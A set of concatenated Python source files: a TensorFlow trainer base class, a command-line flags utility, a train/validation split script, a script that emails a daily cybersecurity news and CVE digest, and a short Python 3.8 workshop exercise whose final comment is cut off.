# with tf.compat.v1.variable_scope(scope_or_name):
# # rnn_out = tf.Print(rnn_out,[tf.shape(rnn_out)],"Shape of RNN Output: ")
# shape_static = rnn_out.get_shape().as_list()
# cell_size = shape_static[2] // 2
# shape_dynamic = tf.shape(rnn_out)
# max_time = shape_dynamic[0]
# # max_time = tf.Print(max_time, [max_time], "MaxT: ")
# batch_size = shape_dynamic[1]
# # [max_time, batch_size, 2*cell_size] -> [max_time, batch_size, 2, cell_size]
# rnn_out = tf.reshape(rnn_out, shape=[max_time, batch_size, 2, cell_size])
# # [max_time, batch_size, 2, cell_size] -> [max_time, batch_size, cell_size]
# rnn_out = tf.reduce_sum(rnn_out, axis=2)
#
# # TODO: substitute?
# # rnn_in = rnn_out[0] + rnn_out[1]
# return rnn_out
#
# def cubrnn_to_conv(scope_or_name, rnn_out, data_format='NHWC'):
# """
# Adds a utility layer to transform the output Tensor of a bidirectional dynamic RNN into a Tensor which
# fits a convolutional layer. This function assumes `time_major` == True in the BRNN.
#
# Args:
# scope_or_name: `str` or `VariableScope`, the scope to open.
# rnn_out: tuple of `3-D Tensors`, length 2, the BRNN output (see tf.nn.bidirectional_dynamic_rnn
# for more information regarding the output format).
# data_format: `str` from ('NHWC', 'NCHW'), specifies the data format of the returned Tensor.
#
# Returns:
# `4-D Tensor`, the transformed `rnn_out` Tensor with its shape determined by `data_format`.
#
# For 'NHWC' the data is stored in the order of `[batch_size, cell_size, max_time, 1]`, which
# corresponds to `[batch_size, Y, X, Z]`.
#
# For 'NCHW' the data is stored in the order of `[batch_size, 1, cell_size, max_time]`, which
# corresponds to `[batch_size, Z, Y, X]`.
# """
# with tf.compat.v1.variable_scope(scope_or_name):
# shape_static = rnn_out.get_shape().as_list()
# cell_size = shape_static[2] // 2
# shape_dynamic = tf.shape(rnn_out)
# max_time = shape_dynamic[0]
# batch_size = shape_dynamic[1]
# # [max_time, batch_size, 2*cell_size] -> [max_time, batch_size, 2, cell_size]
# conv_in = tf.reshape(rnn_out, shape=[max_time, batch_size, 2, cell_size])
# # [max_time, batch_size, 2, cell_size] -> [max_time, batch_size, cell_size]
# conv_in = tf.reduce_sum(conv_in, axis=2)
# # [max_time, batch_size, cell_size] -> [batch_size, cell_size, max_time]
# conv_in = tf.transpose(conv_in, [1, 2, 0])
#
# if data_format == 'NHWC':
# # [batch_size, cell_size, max_time] -> [batch_size, cell_size, max_time, 1]
# conv_in = tf.reshape(conv_in, [batch_size, cell_size, max_time, 1])
# # [batch_size, cell_size, max_time, 1] corresponds to [batch_size, Y, X, Z], 'NHWC'
# else:
# # [batch_size, cell_size, max_time] -> [batch_size, 1, cell_size, max_time]
# conv_in = tf.reshape(conv_in, [batch_size, 1, cell_size, max_time])
# # [batch_size, 1, cell_size, max_time] corresponds to [batch_size, Z, Y, X], 'NCHW'
# return conv_in
def feat_norm(input, dimZ):
beta = tf.compat.v1.get_variable('beta', shape=(dimZ,), initializer=tf.constant_initializer(value=0.0))
gamma = tf.compat.v1.get_variable('gamma', shape=(dimZ,), initializer=tf.constant_initializer(value=1.0))
output, _, _ = tf.nn.fused_batch_norm(input, gamma, beta)
return output
#
# def separable_rnn(images, num_filters_out, scope=None, keep_prob=1.0, cellType='LSTM'):
# """Run bidirectional LSTMs first horizontally then vertically.
#
# Args:
# images: (num_images, height, width, depth) tensor
# num_filters_out: output layer depth
# nhidden: hidden layer depth
# scope: optional scope name
#
# Returns:
# (num_images, height, width, num_filters_out) tensor
# """
# with tf.compat.v1.variable_scope(scope, "SeparableLstm", [images]):
# with tf.compat.v1.variable_scope("horizontal"):
# if 'LSTM' in cellType:
# cell_fw = LSTMCell(num_filters_out, use_peepholes=True, state_is_tuple=True)
# cell_bw = LSTMCell(num_filters_out, use_peepholes=True, state_is_tuple=True)
# if 'GRU' in cellType:
# cell_fw = GRUCell(num_filters_out)
# cell_bw = GRUCell(num_filters_out)
# hidden = horizontal_cell(images, num_filters_out, cell_fw, cell_bw, keep_prob=keep_prob, scope=scope)
# with tf.compat.v1.variable_scope("vertical"):
# transposed = tf.transpose(hidden, [0, 2, 1, 3])
# if 'LSTM' in cellType:
# cell_fw = LSTMCell(num_filters_out, use_peepholes=True, state_is_tuple=True)
# cell_bw = LSTMCell(num_filters_out, use_peepholes=True, state_is_tuple=True)
# if 'GRU' in cellType:
# cell_fw = GRUCell(num_filters_out)
# cell_bw = GRUCell(num_filters_out)
# output_transposed = horizontal_cell(transposed, num_filters_out, cell_fw, cell_bw, keep_prob=keep_prob,
# scope=scope)
# output = tf.transpose(output_transposed, [0, 2, 1, 3])
# return output
#
# def horizontal_cell(images, num_filters_out, cell_fw, cell_bw, keep_prob=1.0, scope=None):
# """Run an LSTM bidirectionally over all the rows of each image.
#
# Args:
# images: (num_images, height, width, depth) tensor
# num_filters_out: output depth
# scope: optional scope name
#
# Returns:
# (num_images, height, width, num_filters_out) tensor, where
# """
# with tf.compat.v1.variable_scope(scope, "HorizontalGru", [images]):
# sequence = images_to_sequence(images)
#
# shapeT = tf.shape(sequence)
# sequence_length = shapeT[0]
# batch_sizeRNN = shapeT[1]
# sequence_lengths = tf.cast(
# tf.fill([batch_sizeRNN], sequence_length), dtype=tf.int64)
# forward_drop1 = DropoutWrapper(cell_fw, output_keep_prob=keep_prob)
# backward_drop1 = DropoutWrapper(cell_bw, output_keep_prob=keep_prob)
# rnn_out1, _ = tf.nn.bidirectional_dynamic_rnn(forward_drop1, backward_drop1, sequence, dtype=tf.float32,
# sequence_length=sequence_lengths, time_major=True,
# swap_memory=True, scope=scope)
# rnn_out1 = tf.concat(rnn_out1, 2)
# rnn_out1 = tf.reshape(rnn_out1, shape=[-1, batch_sizeRNN, 2, num_filters_out])
# output_sequence = tf.reduce_sum(rnn_out1, axis=2)
# batch_size = tf.shape(images)[0]
# output = sequence_to_images(output_sequence, batch_size)
# return output
#
# def images_to_sequence(tensor):
# """Convert a batch of images into a batch of sequences.
#
# Args:
# tensor: a (num_images, height, width, depth) tensor
#
# Returns:
# (width, num_images*height, depth) sequence tensor
# """
# transposed = tf.transpose(tensor, [2, 0, 1, 3])
#
# shapeT = tf.shape(transposed)
# shapeL = transposed.get_shape().as_list()
# # Calculate the ouput size of the upsampled tensor
# n_shape = tf.stack([
# shapeT[0],
# shapeT[1] * shapeT[2],
# shapeL[3]
# ])
# reshaped = tf.reshape(transposed, n_shape)
# return reshaped
#
# def sequence_to_images(tensor, num_batches):
# """Convert a batch of sequences into a batch of images.
#
# Args:
# tensor: (num_steps, num_batchesRNN, depth) sequence tensor
# num_batches: the number of image batches
#
# Returns:
# (num_batches, height, width, depth) tensor
# """
#
# shapeT = tf.shape(tensor)
# shapeL = tensor.get_shape().as_list()
# # Calculate the ouput size of the upsampled tensor
# height = tf.cast(shapeT[1] / num_batches, dtype=tf.int32)
# n_shape = tf.stack([
# shapeT[0],
# num_batches,
# height,
# shapeL[2]
# ])
#
# reshaped = tf.reshape(tensor, n_shape)
# return tf.transpose(reshaped, [1, 2, 0, 3])
# </editor-fold>
```
#### File: tf_neiss-1/trainer/trainer_base.py
```python
import glob
import logging
import os
import time
import tensorflow as tf
import util.flags as flags
from util.misc import get_commit_id, Tee
os.environ["CUDA_VISIBLE_DEVICES"] = ""
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
# Training
# ========
flags.define_integer('epochs', 200, 'Epochs to train. If checkpoint already has these epochs, '
                                    'an evaluation and export is done')
flags.define_integer('samples_per_epoch', 100000, 'Samples shown to the net per epoch.')
# flags.define_boolean('calc_ema', False, 'Choose whether you want to use EMA (Exponential Moving Average) '
# 'weights or not,')
# flags.define_float('clip_grad', 0.0, 'gradient clipping value: for positive values GLOBAL norm clipping is performed,'
# ' for negative values LOCAL norm clipping is performed (default: %(default)s)')
flags.define_string('optimizer', 'DecayOptimizer', 'the optimizer used to compute and apply gradients.')
flags.define_dict('optimizer_params', {}, "key=value pairs defining the configuration of the optimizer.")
flags.define_string('learn_rate_schedule', "decay", 'decay, finaldecay, warmupfinaldecay')
flags.define_dict("learn_rate_params", {}, "key=value pairs defining the configuration of the learn_rate_schedule.")
# flags.define_string('train_scopes', '', 'Change only variables in this scope during training')
flags.define_integer('eval_every_n', 1, "Evaluate/Validate every 'n' epochs") # Todo: to be implemented
flags.define_string('checkpoint_dir', '', 'Checkpoint to save model information in.')
# flags.define_string('warmstart_dir', '', 'load pretrained model (ignored if checkpoint_dir already exists, '
# 'then this one is used).')
flags.define_boolean('reset_global_step', False, 'resets global_step, this restarts the learning_rate decay, '
'only works with load from warmstart_dir') # Todo: to be implemented
flags.define_list('train_lists', str, 'space separated list of training sample lists',
"names of the training sample lists to use. You can provide a single list as well. ",
["lists/stazh_train.lst"])
flags.define_list('train_list_ratios', float, 'space separated list of training sample list ratios',
"List has to have the same length as the train_list ", [1.0])
flags.define_integer('train_batch_size', 100, 'number of elements in a training batch, '
'samples between optimizer steps.')
# flags.define_integer('train_accum_steps', 1,
# 'Reduce on device batchSize by gradient accumulation (default: %(default)s).'
# 'Train_batch_size is divided by this factor BUT the gradient is accumulated'
# 'this many times, until an optimization step is performed. This allows HIGH'
# 'batchSizes even with limited memory and huge models.')
flags.define_string('val_list', None, '.lst-file specifying the dataset used for validation')
flags.define_integer('val_batch_size', 100, 'number of elements in a val_batch between training '
                                            'epochs (default: %(default)s). '
'has no effect if status is not "train"')
# flags.define_boolean('profile', False, 'produce profile file each epoch')
# flags.define_boolean('predict_mode', False, 'If and only if true the prediction will be accomplished, '
# 'predict means no targets provided')
# flags.define_string('predict_list', '',
# '.lst-file specifying the dataset used for prediction. Only used in predict_mode')
# flags.define_string('predict_dir', '', 'path/to/file where to write the prediction')
# Hardware
# ========
# flags.define_boolean('xla', False, 'Disable in case of XLA related errors or performance issues (default: %(default)s)')
flags.define_list('gpu_devices', int, 'space separated list of GPU indices to use. ', " ", [])
# flags.define_string('dist_strategy', 'mirror', 'DistributionStrategy in MultiGPU scenario. '
# 'mirror - MirroredStrategy, ps - ParameterServerStrategy')
# flags.define_boolean('gpu_auto_tune', False, 'GPU auto tune (default: %(default)s)')
# flags.define_float('gpu_memory', -1, 'set gpu memory in MB allocated on each (allowed) gpu')
flags.define_string('print_to', 'console', 'write prints to "console", "file" or "both"')
flags.define_boolean("tensorboard", True, "if True: write tensorboard logs")
flags.define_boolean('force_eager', False, 'ignore tf.function decorator, run everything eagerly for debugging')
flags.FLAGS.parse_flags()
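# Illustrative invocation of a trainer script built on TrainerBase (the script name, paths and
# flag values below are placeholders, not taken from the repository):
#
#   python -u my_trainer.py @configs/example.conf \
#       --checkpoint_dir models/run1 \
#       --train_lists lists/stazh_train.lst --train_list_ratios 1.0 \
#       --val_list lists/stazh_val.lst \
#       --optimizer_params learning_rate=0.01 \
#       --gpu_devices 0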
class TrainerBase(object):
def __init__(self):
self._flags = flags.FLAGS
tee_path = os.path.join(os.path.dirname(flags.FLAGS.checkpoint_dir),
"log_" + os.path.basename(flags.FLAGS.checkpoint_dir) + ".txt")
if flags.FLAGS.print_to == "file":
self.tee = Tee(tee_path, console=False, delete_existing=False)
elif flags.FLAGS.print_to == "both":
self.tee = Tee(tee_path, console=True, delete_existing=False)
else:
self.tee = None
self.set_run_config()
flags.print_flags()
self._input_fn_generator = None
self._model_class = None
self._model = None
self._checkpoint_obj_val = None
self._optimizer_fn = None
self._optimizer = None
self._train_dataset = None
self._run_config = None
self._params = None
self._current_epoch = 0
self.epoch_loss = 0.0
self._train_collection = None
self._params = {'steps_per_epoch': int(self._flags.samples_per_epoch / self._flags.train_batch_size),
'num_gpus': len(self._flags.gpu_devices)}
def __del__(self):
# reset print streams
del self.tee
def train(self):
commit_id, repos_path = get_commit_id(os.path.realpath(__file__))
print("source code path:{}\ncommit-id: {}".format(repos_path, commit_id))
print("tf-version: {}".format(tf.__version__))
if not self._model:
self._model = self._model_class(self._params)
if not self._model.graph_train:
self._model.graph_train = self._model.get_graph()
self._model.set_optimizer()
self._model.graph_train.set_interface(self._input_fn_generator.get_input_fn_val())
self._model.graph_train.print_params()
self._model.graph_train.summary()
checkpoint_obj = tf.train.Checkpoint(step=self._model.graph_train.global_step, optimizer=self._model.optimizer,
model=self._model.graph_train)
checkpoint_manager = tf.train.CheckpointManager(checkpoint=checkpoint_obj, directory=flags.FLAGS.checkpoint_dir,
max_to_keep=1)
if tf.train.get_checkpoint_state(flags.FLAGS.checkpoint_dir):
print("restore from checkpoint: {}".format(flags.FLAGS.checkpoint_dir))
checkpoint_obj.restore(tf.train.latest_checkpoint(flags.FLAGS.checkpoint_dir))
if self._model.graph_train.global_epoch.numpy() >= self._flags.epochs:
print('Loaded model already in epoch {}. Evaluation...'.format(self._model.graph_train.global_epoch.numpy()))
                print('Loaded model already in epoch {}. Evaluation...'.format(self._model.graph_train.global_epoch.numpy())) if False else None  # noqa
self.export()
return 0
else:
print('starting in epoch ' + str(self._model.graph_train.global_epoch.numpy()))
if not self._train_dataset:
self._train_dataset = self._input_fn_generator.get_input_fn_train()
while True:
if self._model.graph_train.global_epoch.numpy() >= self._flags.epochs:
break
self.epoch_loss = 0.0
t1 = time.time()
for (batch, (input_features, targets)) in enumerate(self._input_fn_generator.get_input_fn_train()):
# do the _train_step as tf.function to improve performance
train_out_dict = self._train_step(input_features, targets)
self._model.to_tensorboard_train(train_out_dict, targets, input_features)
self.epoch_loss += train_out_dict["loss"]
if batch + 1 >= int(self._flags.samples_per_epoch / self._flags.train_batch_size):
# stop endless '.repeat()' dataset with break
break
self.epoch_loss /= float(batch + 1.0)
self._model.graph_train.global_epoch.assign_add(1)
print("\nepoch: {:10.0f}, optimizer steps: {:6}".format(self._model.graph_train.global_epoch.numpy(),
self._model.graph_train.global_step.numpy()))
print("train-loss:{:8.3f}, samples/seconde: {:1.1f}".format(self.epoch_loss,
flags.FLAGS.samples_per_epoch / (
time.time() - t1)))
# Save checkpoint each epoch
checkpoint_manager.save()
# Evaluation on this checkpoint
self.eval()
self._model.write_tensorboard()
self.export()
@tf.function
def _train_step(self, input_features, targets):
with tf.GradientTape() as self.tape:
self._model.graph_train._graph_out = self._model.graph_train(input_features, training=True)
loss = self._model.loss(predictions=self._model.graph_train._graph_out, targets=targets)
gradients = self.tape.gradient(loss, self._model.graph_train.trainable_variables)
self._model.optimizer.apply_gradients(zip(gradients, self._model.graph_train.trainable_variables))
self._model.graph_train.global_step.assign(self._model.optimizer.iterations)
return {"loss": tf.reduce_mean(loss)}
def eval(self):
if not self._model:
self._model = self._model_class(self._params)
if not self._model.graph_eval:
self._model.graph_eval = self._model.get_graph()
if not self._checkpoint_obj_val:
self._checkpoint_obj_val = tf.train.Checkpoint(model=self._model.graph_eval)
self._checkpoint_obj_val.restore(tf.train.latest_checkpoint(flags.FLAGS.checkpoint_dir))
val_loss = 0.0
t_val = time.time()
for (batch, (input_features, targets)) in enumerate(self._input_fn_generator.get_input_fn_val()):
input_features = {"fc": input_features["fc"], "fc2": input_features["fc"]}
self._model.graph_eval._graph_out = self._model.graph_eval(input_features, training=False)
loss = self._model.loss(predictions=self._model.graph_eval._graph_out, targets=targets)
self._model.graph_eval._graph_out["loss"] = loss
self._model.to_tensorboard_eval(self._model.graph_eval._graph_out, targets, input_features)
val_loss += tf.reduce_mean(loss)
val_loss /= float(batch + 1.0)
print(
"val-loss:{:10.3f}, samples/seconde: {:1.1f}".format(val_loss, (batch + 1) * flags.FLAGS.val_batch_size / (
time.time() - t_val)))
def export(self):
# Export as saved model
print("Export saved_model to: {}".format(os.path.join(flags.FLAGS.checkpoint_dir, "export")))
self._model.graph_train.save(os.path.join(flags.FLAGS.checkpoint_dir, "export"))
def set_run_config(self):
if flags.FLAGS.force_eager:
tf.config.experimental_run_functions_eagerly(run_eagerly=True)
gpu_list = ','.join(str(x) for x in flags.FLAGS.gpu_devices)
os.environ["CUDA_VISIBLE_DEVICES"] = gpu_list
print("GPU-DEVICES:", os.environ["CUDA_VISIBLE_DEVICES"])
```
#### File: tf_neiss-1/util/flags.py
```python
import argparse
import logging
import sys
from collections import OrderedDict
# =========================
# Extension of tf.app.flags
# =========================
class LineArgumentParser(argparse.ArgumentParser):
"""
Object for parsing command line strings into Python objects. Inherits from `argparse.ArgumentParser`.
Overrides the `convert_arg_line_to_args` method, such that each line in a file can contain the argument
and its values instead of each line only containing a single entry. Argument and values can be seperated
by spaces or with a ' = '. Anything commented with '#' is ignored.
"""
def convert_arg_line_to_args(self, arg_line):
args = arg_line.split()
for i, arg in enumerate(args):
# Cut off anything that is commented
if arg == "#":
return args[:i]
# Remove equals sign from args
if arg == "=":
args.remove("=")
return args
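# Example config-file lines this parser accepts (illustrative values, not from the repository);
# each line holds one flag plus its values, '=' is optional and a standalone '#' starts a comment:
#
#   --epochs = 200            # everything after the '#' token is dropped
#   --train_batch_size 64
#   --gpu_devices 0 1
#
# The file is referenced on the command line via the '@' prefix, e.g. '@path/to/config'.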
# Global object that can be used to access the parser.
usage_string = """%(prog)s [OPTIONS] [CONFIG]
You can add specific options via '--OPTION VALUE'
You can reference config files via '@path/to/config'"""
global_parser = LineArgumentParser(usage=usage_string, fromfile_prefix_chars="@")
class NamespaceWithOrder(argparse.Namespace):
"""
Object for storing attributes. Inherits from `argparse.Namespace`.
Implements the `__init__` and `__setattr__` methods, such that any call to `__setattr__`
saves the (`attr`, `value`) pair in an extra argument `order`, which is an ordered list.
This is useful if one wants to preserve the information in which order (`argument`, `value`)
pairs were added to the namespace. This includes default values of arguments, aswell as arguments
fed via the command line, although it will include duplicates if arguments get fed more than once.
"""
def __init__(self, **kwargs):
self.__dict__['order'] = []
super(NamespaceWithOrder, self).__init__(**kwargs)
def __setattr__(self, attr, value):
self.__dict__['order'].append((attr, value))
super(NamespaceWithOrder, self).__setattr__(attr, value)
class FlagValues(object):
"""Global container and accessor for flags and their values."""
def __init__(self):
self.__dict__['__flags'] = {}
self.__dict__['__parsed'] = False
self.__dict__['namespace'] = NamespaceWithOrder()
def parse_flags(self, args=None):
result, unparsed = global_parser.parse_known_args(args=args, namespace=self.__dict__['namespace'])
for flag_name, val in vars(result).items():
self.__dict__['__flags'][flag_name] = val
self.__dict__['__parsed'] = True
return unparsed
def hasKey(self, name_string):
return name_string in self.__dict__['__flags']
def __getattr__(self, name):
"""Retrieves the 'value' attribute of the flag --name."""
if not self.__dict__['__parsed']:
self.parse_flags()
if name not in self.__dict__['__flags']:
raise AttributeError(name)
return self.__dict__['__flags'][name]
def __setattr__(self, name, value):
"""Sets the 'value' attribute of the flag --name."""
if not self.__dict__['__parsed']:
self.parse_flags()
self.__dict__['__flags'][name] = value
# Global object that can be used to access the flags.
FLAGS = FlagValues()
def _define_helper(flag_name, default_value, docstring, flagtype, metavar):
"""Registers 'flag_name' with 'default_value', 'docstring' and 'metavar'."""
global_parser.add_argument('--' + flag_name,
default=default_value,
help=docstring,
type=flagtype,
metavar=metavar)
def define_string(flag_name, default_value, docstring, metavar="STR"):
"""
Defines a flag of type 'string'.
Args:
flag_name: `str`, the name of the flag.
default_value: `str`, the default value the flag should take.
docstring: `str`, a helpful message explaining the use of the flag.
metavar: `str`, a name for the argument in usage messages.
"""
_define_helper(flag_name, default_value, docstring, str, metavar)
def define_integer(flag_name, default_value, docstring, metavar="INT"):
"""
Defines a flag of type 'int'.
Args:
flag_name: `str`, the name of the flag.
default_value: `int`, the default value the flag should take.
docstring: `str`, a helpful message explaining the use of the flag.
metavar: `str`, a name for the argument in usage messages.
"""
_define_helper(flag_name, default_value, docstring, int, metavar)
def define_float(flag_name, default_value, docstring, metavar="FLOAT"):
"""
Defines a flag of type 'float'.
Args:
flag_name: `str`, the name of the flag.
default_value: `float`, the default value the flag should take.
docstring: `str`, a helpful message explaining the use of the flag.
metavar: `str`, a name for the argument in usage messages.
"""
_define_helper(flag_name, default_value, docstring, float, metavar)
def define_boolean(flag_name, default_value, docstring, metavar="BOOL"):
"""
Defines a flag of type 'boolean'.
Args:
flag_name: `str`, the name of the flag.
default_value: `bool`, the default value the flag should take.
docstring: `str`, a helpful message explaining the use of the flag.
metavar: `str`, a name for the argument in usage messages.
"""
# Register a custom function for 'bool' so --flag=True works.
def str2bool(v):
return v.lower() in ('true', 't', '1')
global_parser.add_argument('--' + flag_name,
nargs='?',
const=True,
help=docstring,
default=default_value,
type=str2bool,
metavar=metavar)
# Add negated version, stay consistent with argparse with regard to
# dashes in flag names.
# global_parser.add_argument('--no_' + flag_name,
# action='store_false',
# dest=flag_name.replace('-', '_'))
# The internal google library defines the following alias, so we match
# the API for consistency.
DEFINE_bool = define_boolean # pylint: disable=invalid-name
def define_list(flag_name, flag_type, metavar, docstring, default_value=None):
"""
Defines a flag as a list of multiple entries.
Args:
flag_name: `str`, the name of the flag.
flag_type: the data type to which the list elements should be converted.
metavar: `str`, a name for the argument in usage messages.
docstring: `str`, a helpful message explaining the use of the flag.
default_value: `flag_type`, the default value the flag should take.
"""
global_parser.add_argument('--' + flag_name,
type=flag_type,
default=default_value,
nargs='*',
metavar=metavar,
help=docstring)
def define_choices(flag_name, choices, default_value, flag_type, metavar, docstring):
"""
Defines a flag with predefined choices.
Args:
flag_name: `str`, the name of the flag.
choices: `container`, contains the allowed values for the argument.
default_value: entry of `choices`, the default value the flag should take.
flag_type: the data type to which the flag should be converted.
metavar: `str`, a name for the argument in usage messages.
docstring: `str`, a helpful message explaining the use of the flag.
"""
global_parser.add_argument('--' + flag_name,
type=flag_type,
default=default_value,
choices=choices,
metavar=metavar,
help=docstring)
def define_dict(flag_name, default_value, docstring):
"""
Defines a flag as dictionary of key-value pairs.
Args:
flag_name: `str`, the name of the flag.
default_value: `dict` of key=value pairs, the default value the flag should take.
docstring: `str`, a helpful message explaining the use of the flag.
"""
global_parser.add_argument('--' + flag_name,
action=StoreDictKeyPair,
default=default_value,
nargs="*",
metavar="KEY=VAL",
help=docstring)
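# --- Illustrative usage sketch (not part of the original module; the flag names are made up) ---
# Assuming this file is imported as `flags`, definitions and access might look like:
#
#   flags.define_string("data_dir", "/tmp/data", "Directory holding the training data.")
#   flags.define_integer("batch_size", 32, "Number of samples per batch.")
#   flags.define_boolean("debug", False, "Enable verbose logging.")
#   flags.define_list("layers", int, "N", "Hidden layer sizes.", default_value=[128, 64])
#   flags.define_dict("grid_params", {}, "Key=value options for the grid.")
#   print(flags.FLAGS.batch_size)  # assumes FlagValues above exposes parsed flags as attributes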
class StoreDictKeyPair(argparse.Action):
def is_number(self, string):
try:
float(string)
return True
except ValueError:
return False
def str_is_true(self, v):
return v.lower() in ('true', 't')
def str_is_false(self, v):
return v.lower() in ('false', 'f')
def __init__(self, option_strings, dest, nargs=None, **kwargs):
super(StoreDictKeyPair, self).__init__(option_strings, dest, nargs=nargs, **kwargs)
def __call__(self, parser, namespace, values, option_string=None):
if not getattr(namespace, self.dest):
setattr(namespace, self.dest, {})
for kv in values:
if len(kv.split('=')) == 2:
key, val = kv.split("=")
# convert to type
if self.str_is_true(val):
val = True
elif self.str_is_false(val):
val = False
elif self.is_number(val):
f = float(val)
i = int(f)
val = i if i == f else f
# update the dict
getattr(namespace, self.dest).update({key: val})
def print_flags():
"""Prints all registered flags in order."""
order_final = OrderedDict()
for key, value in FLAGS.order:
order_final[key] = value
print("FLAGS:")
if sys.version_info[0] < 3:
flag_list = order_final.items()
else:
flag_list = iter(order_final.items())
for key, value in flag_list:
print(" {} = {}".format(key, value))
def update_params(class_params, flag_params, name="", print_params=False):
"""update a dictionary holding various parameter (int, float, bool, list) using (a 'flag' containing) a dictionary
- all keyes from 'flag_params'should be in 'class_params or a critical warning is printed
- use print_params=True to print out what happens within
Args:
class_params: dictionary which is returned, with updated entries
flag_params: dictionary from which the update is made, should only contain key allready class_params:
name: just a string can be printed if print_params=True
print_params:
:return class_params: updated dictionayry"""
if print_params:
print("---{}---".format(name))
print("available {}_params:".format(name))
for i, j in enumerate(class_params):
print(" {}: {}".format(j, class_params[j]))
print("passed FLAGS.{}_params:".format(name))
for i, j in enumerate(flag_params):
print(" {}: {}".format(j, flag_params[j]))
for i in flag_params:
if i not in class_params:
logging.critical("Given {0}_params-key '{1}' is not used by {0}-class!".format(name, i))
list_params = [] # save keys with type list for later
for j in class_params:
# print(j, type(self.netparams[j]))
if isinstance(class_params[j], (list,)):
list_params.append(j)
# print(list_params)
class_params.update(flag_params)
for j in flag_params: # check if key with type list should be updated, cast given string to list
if j in list_params:
logging.info("//// Flags handling: cast {} to list".format(j))
assert isinstance(flag_params[j], str)
try:
# Integer Case
class_params[j] = [int(x) for x in flag_params[j][1:-1].split(",")]
except ValueError:
try:
# float Case
class_params[j] = [float(x) for x in flag_params[j][1:-1].split(",")]
except ValueError:
# If int/float cases fail, make it string...
class_params[j] = [x for x in flag_params[j][1:-1].split(",")]
if print_params:
print("updated {}_params:".format(name))
for i, j in enumerate(class_params):
print(" {}: {}".format(j, class_params[j]))
return class_params
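# --- Illustrative sketch of update_params (assumed values, not part of the original module) ---
# class_params = {"lr": 0.01, "layers": [64, 64], "dropout": 0.5}
# flag_params = {"lr": 0.001, "layers": "[128,128,64]"}
# class_params = update_params(class_params, flag_params, name="net", print_params=True)
# # -> "lr" becomes 0.001 and the string "[128,128,64]" is cast back to the list [128, 128, 64]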
# def run(main=None, argv=None):
# """Runs the program with an optional 'main' function and 'argv' list."""
# # Extract the args from the optional `argv` list.
# args = argv[1:] if argv else None
#
# # Parse the known flags from that list, or from the command
# # line otherwise.
# # pylint: disable=protected-access
# flags_passthrough = FLAGS.parse_flags(args=args)
# # pylint: enable=protected-access
#
# main = main or sys.modules['__main__'].main
#
# # Call the main function, passing through any arguments
# # to the final program.
# sys.exit(main(sys.argv[:1] + flags_passthrough))
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("--grid", action=StoreDictKeyPair, nargs="*", metavar="KEY=VAL",
default={'grid_height': 3, 'magnitude': 2, 'noise': 'normal', 'fixate_edges': True,
'map_edges': False})
args = parser.parse_args("--grid grid_height=4 magnitude=2.0 fix_edges=True test=1.25".split())
print(args)
```
#### File: util/tools/split_train_val.py
```python
import glob
import logging
import os
import shutil
import sys
"""script to divide a folder with generated/training data into a train and val folder
- val folder contains 500 Samples if not changed in source code
- DOES NOT work if images structured in subfolders, see below
- if there is no dir in the given folder -> split this folder
- if there are dir/s in the folder -> perform split on each folder
- split on sorted list -> repeated runs should give the same result
"""
def main(args):
foldername = args[1]
print("CWD: {}".format(os.getcwd()))
print("foldername: {}".format(foldername))
dirs = next(os.walk(foldername))[1]
dirs = [os.path.join(foldername, x) for x in dirs]
print(dirs)
if len(dirs) == 0:
print("no subdirs found -> run directly on {}".format(foldername))
dirs = [foldername]
for dir in dirs:
print("perform split on {}".format(dir))
dir_path = dir
# image_list = sorted(glob.glob1(os.path.join(foldername, dir_path), "*.jpg"))
image_list = sorted(glob.glob1(dir_path, "*.jpg"))
# image_list = sorted(glob.glob1(dir_path , "*.png"))
if len(image_list) == 0:
logging.error("Could not find any '*.jpg' in {}".format(dir_path))
exit(1)
else:
print(" found {} images".format(len(image_list)))
# val_len = int(len(image_list) * 0.1)
val_len = int(500)
val_list = image_list[:val_len]
train_list = image_list[val_len:]
# save first 10%/500 of list to val list
for subdir, part_list in zip(["val", "train"], [val_list, train_list]):
os.makedirs(os.path.join(dir_path, subdir))
print(" move files in {}...".format(subdir))
for image_file in part_list:
shutil.move(os.path.join(dir_path, image_file), os.path.join(dir_path, subdir, image_file))
try:
shutil.move(os.path.join(dir_path, image_file + ".txt"),
os.path.join(dir_path, subdir, image_file + ".txt"))
except IOError as ex:
print(ex)
try:
shutil.move(os.path.join(dir_path, image_file + ".info"),
os.path.join(dir_path, subdir, image_file + ".info"))
except IOError as ex:
pass
print(" write list: {}...".format(os.path.join(dir_path, "{}_{}.lst".format(dir_path, subdir))))
with open(os.path.join(foldername, "{}_{}.lst".format(os.path.basename(dir_path), subdir)), "w") as fobj:
fobj.writelines([os.path.join(dir_path, subdir, x) + "\n" for x in part_list])
if __name__ == '__main__':
main(sys.argv)
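# --- Example invocation (assumed directory layout, not part of the original script) ---
# $ python split_train_val.py ./generated_data
# # for each subfolder (or the folder itself if it has none) the first 500 sorted *.jpg files,
# # plus their matching .txt/.info files, are moved to <dir>/val and the rest to <dir>/train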
``` |
{
"source": "JochiRaider/Cybersecrity_News_Agent",
"score": 2
} |
#### File: JochiRaider/Cybersecrity_News_Agent/main.py
```python
import re
import datetime
import ezgmail
from gmail_formatter import ComposeEmail
from news_scraper import NewsScrapers
from xkcd_scraper import xkcd_rng_scraper
from cve_agent import cve_api_agent
def main():
comic = xkcd_rng_scraper()
cve_list = cve_api_agent()
news_art_list = NewsScrapers().news_call()
out_email = ComposeEmail(xkcd_list=comic,cve_list=cve_list,news_art_list=news_art_list).final_draft()
today_date = re.compile(r'^2[0-9]{3}.[0-9]{2}.[0-9]{2}').search(str(datetime.datetime.now())).group()
local_name = f'nes_email_{today_date}.html'
with open(local_name,'w') as f:
f.write(out_email)
out_subject = f'News email service for {today_date}'
ezgmail.send('[email protected]', out_subject, out_email, mimeSubtype='html')
if __name__=='__main__':
main()
``` |
{
"source": "jochman/py38workshop",
"score": 3
} |
#### File: py38workshop/3.8/exercise.py
```python
forms = [
{"severity": 6, "factor": 1, "active": 2},
{"severity": 6, "factor": 2, "active": 4},
{"severity": 6, "factor": 3, "active": 0},
]
def calc(severity, factor, divider):
return severity * (factor / divider)
readable = ""
for form in forms:
divider = form["active"]
if divider == 0:
divider = 1
severity = form["severity"]
if severity < 7:
severity = 5
factor = form["factor"]
calculated_severity = calc(severity, divider=divider, factor=factor)
readable += f"calculated_severity={calculated_severity}\n"
return_outputs(readable)
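# --- Possible 3.8 touch-up (a sketch; assumes the exercise targets the f-string '=' specifier,
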